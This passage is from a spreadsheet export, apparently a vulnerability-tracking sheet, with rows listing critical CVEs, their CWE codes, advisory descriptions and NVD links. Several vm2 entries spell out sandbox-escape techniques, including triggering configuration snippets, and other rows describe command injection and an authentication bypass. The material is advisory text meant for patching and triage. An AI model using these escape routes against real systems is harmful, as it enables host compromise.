          <t>vm2 is a sandbox for running untrusted Node.js code. In versions &gt;= 3.11.4 and &lt;= 3.11.6, the NodeVM constructor computes `hasRealRequireConfig` with `typeof requireOpts === 'object' &amp;&amp; requireOpts !== null`, so an array-shaped `require` value (for example `require: []`) satisfies the guard that is meant to reject nesting without an explicit require configuration. `makeResolverFromLegacyOptions()` then destructures the array into undefined option fields and returns a resolver containing only `NESTING_OVERRIDE.vm2`. As a result, an attacker who can supply JavaScript executed by a NodeVM configured with truthy `nesting` and an array-shaped `require` (e.g. `new NodeVM({nesting: true, require: []})`) can require the host `vm2` module, create an inner NodeVM with an attacker-chosen builtin allowlist (such as `child_process`), and execute arbitrary commands with the privileges of the host Node.js process, escaping the sandbox. Outer builtin restrictions do not constrain the attacker-created inner NodeVM. This issue is fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92935</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54501</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-250, CWE-77, CWE-78, CWE-88</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>Browsertrix is a high-fidelity, browser-based crawling service for web archiving that can be self-hosted or used through Webrecorder's hosted instance. From 1.15.0 until 1.22.8, Browsertrix improperly sanitizes Git URLs specified as Custom Behaviors, allowing command injection through /api/orgs/*/crawlconfigs/validate/custom-behavior. A user with crawler or administrator permission on the specific instance can supply a crafted Git URL that executes arbitrary operating-system commands in the backend pod. Open registration or hosted free-trial access can make the required role broadly obtainable. Successful exploitation can expose, modify, or delete application database records, archived items, browser profiles, storage data, proxy credentials, and other configured service data. This issue is fixed in version 1.22.8.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54501</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54618</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-522, CWE-601</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>Obsidian Web MCP is a secure remote MCP server for Obsidian vaults. Prior to 0.2.0, /oauth/authorize issues an authorization code without a login, consent, or session check, and /oauth/token can exchange that code for the static VAULT_MCP_TOKEN without authenticating a client. An unauthenticated remote caller who can reach the intended tunnel deployment can therefore call /mcp and use vault_read, vault_write, vault_search, vault_list, vault_move, and vault_delete against the entire vault. Optional PKCE does not prevent an attacker-initiated flow, and unauthenticated /oauth/register also exposes a client_credentials path by returning the configured VAULT_OAUTH_CLIENT_SECRET. This issue is fixed in version 0.2.0.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54618</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92939</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-114</t>
        </is>
      </c>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>vm2 3.11.3 through 3.11.6 exposes the host Node.js crypto module to a NodeVM sandbox when the crypto builtin is allowed. The module is presented via a recursive read-only proxy, but its callable exports still execute with host-process authority. Sandboxed JavaScript can therefore call crypto.setEngine() with a filesystem path to an attacker-supplied native library (for example, one bundled in an untrusted plugin package already written to disk); OpenSSL asks the operating-system dynamic loader to load the file, and the library's constructor executes native code in the host process before engine-symbol validation rejects it. Exploitation requires only the crypto builtin and does not require fs, process, module, child_process, worker_threads, vm, or inspector access, resulting in a sandbox escape and arbitrary native code execution. Fixed in 3.11.7.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92939</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92951</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.7 contains an incorrect authorization vulnerability in the external package allowlist check that uses non-exact substring matching instead of full package-name boundary validation. Attackers can bypass the allowlist by requiring a colliding package name that contains an allowlisted package substring, causing vm2 to load and execute unauthorized host packages in the host context.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92951</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92957</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t>vm2 through 3.11.6 does not normalize `node:`-prefixed builtin specifiers when evaluating user-supplied negative (deny) entries in a NodeVM wildcard require policy. Although NodeVM strips the `node:` prefix during require() resolution, negative wildcard entries are matched by exact string comparison against the canonical builtin names, so a policy such as `new NodeVM({ require: { builtin: ['*', '-node:child_process'] } })` fails to deny the canonical `child_process` module. Sandboxed code can therefore obtain the host `child_process` builtin via `require('child_process')` or `require('node:child_process')`, gaining references to process-spawning APIs such as execSync and spawn, which is equivalent to host command-execution capability for untrusted sandbox code. Fixed in vm2 3.11.7. (Suggested title: "vm2 before 3.11.7: NodeVM builtin deny-list bypass via node:-prefixed specifiers exposes child_process")</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92957</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54237</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-94</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>Wavelog is web-based amateur radio logging software. From 1.8 until 2.4.2, Wavelog exposes /install/ajax.php and /install/includes/interface_assets/triggers.php after installation without an installation lock or permission check. Unsanitized input reaches write_config() and write_configfile() in install/includes/core/core_class.php, allowing a remote unauthenticated attacker to read or write log files and place attacker-controlled content into PHP configuration files. The resulting PHP configuration content can execute on the server. This issue is fixed in version 2.4.2.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54237</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70009</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Azure Arc allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70009</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86863</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-807</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>pgAdmin 4's Webserver authentication source is intended to accept an identity asserted by the web server or reverse proxy in front of pgAdmin, delivered through the WSGI/CGI environment. WebserverAuthentication.get_user() read config.WEBSERVER_REMOTE_USER from request.environ and, when that returned nothing, fell back to reading the same name directly from the inbound HTTP request headers via request.headers.get(). An inbound HTTP header is written by whoever sends the request, so any client able to reach pgAdmin could supply that header itself and be authenticated as any username it named, including an existing Administrator, without presenting a password or any other credential. The environment lookup could also be satisfied by a client-supplied header whenever WEBSERVER_REMOTE_USER was configured to an HTTP_-prefixed or hyphenated name such as HTTP_X_FORWARDED_USER or X-Forwarded-User, since WSGI servers place inbound headers into the environment under exactly those names. Deployments are affected only when 'webserver' is enabled in AUTHENTICATION_SOURCES.
The fix distinguishes a genuine CGI/WSGI variable from a header-derived one and implicitly trusts only the former. A header-asserted identity is now accepted only when the operator explicitly opts in via WEBSERVER_REMOTE_USER_FROM_HEADER, the request arrives from a peer listed in WEBSERVER_TRUSTED_PROXIES, and, when configured, a shared secret supplied in WEBSERVER_SHARED_SECRET_HEADER matches WEBSERVER_SHARED_SECRET under a constant-time comparison. The trusted-peer check deliberately reads the real socket peer address rather than request.remote_addr, because ProxyFix rewrites the latter from the client-controlled X-Forwarded-For header and would otherwise allow an attacker to claim to be the trusted proxy. As defence in depth, login() now refuses any account whose auth_source is not 'webserver', so a misconfigured trust gate cannot be used to assume an internal or LDAP account.
This issue affects pgAdmin 4: from 6.2 before 9.18.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86863</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92950</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-453</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.7 contains a sandbox escape vulnerability in the CLI tool that allows attackers to execute arbitrary code in the host Node.js process. Attackers can supply a malicious script file to the vm2 CLI that uses require(__filename) to re-execute itself in the host realm, bypassing sandbox isolation and accessing host modules like fs and child_process.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92950</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15688</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>Mitsubishielectric.Psirt@yd.MitsubishiElectric.co.jp</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>Incorrect Implementation of Authentication Algorithm Vulnerability in Mitsubishi Electric GX Works3 and Motion Control Setting allows a local attacker to successfully authenticate even with an invalid block password by executing the affected product and modifying part of the executable module in memory, and thereby may be able to view, tamper with, destroy, or delete control programs.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15688</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79752</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr">
        <is>
          <t>composer:cakephp/cakephp, composer:cakephp/database</t>
        </is>
      </c>
      <c r="M51" s="5" t="inlineStr">
        <is>
          <t>4.5.12, 4.6.5, 5.1.9, 5.2.14, 5.3.7</t>
        </is>
      </c>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>CakePHP is a rapid development framework for PHP. Prior to 4.5.12, 4.6.5, 5.1.9, 5.2.14, and 5.3.7, FunctionsBuilder::cast, FunctionsBuilder::extract, FunctionsBuilder::datePart, and FunctionsBuilder::dateAdd in src/Database/FunctionsBuilder.php accept user-controlled dataType, part, or unit values and incorporate them into generated SQL as unescaped structural fragments. An application that passes untrusted input to these parameters can permit SQL injection with confidentiality, integrity, and availability impact according to the database connection's privileges. This issue is fixed in versions 4.5.12, 4.6.5, 5.1.9, 5.2.14, and 5.3.7.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79752</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92943</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>Improper validation of certificate with host mismatch in the MQTT client TLS connection layer in AWS IoT Device SDK for Python 1.5.3 through 1.6.0 on Python 3.7 and later might allow an adversary-in-the-middle actor to impersonate the AWS IoT Core endpoint, read device telemetry, and inject arbitrary MQTT messages that the device processes as authentic, via a certificate issued for an unrelated hostname by a certificate authority present in the device trust store.
To remediate this issue, users should upgrade to version 1.6.1.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92943</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93393</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow exists in the TLS transport layer of the MongoDB C Driver when built with the Windows platform TLS backend. A remote endpoint that the client connects to, or an attacker able to impersonate or redirect the client's connection, can cause the driver to write attacker-supplied data outside the bounds of a heap allocation while processing incoming encrypted traffic. No authentication or user interaction is required, because the affected processing occurs before any application-level authentication completes. Successful exploitation may lead to memory corruption in the client process, disclosure of adjacent heap memory, or termination of the process.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93393</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54670</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-306</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
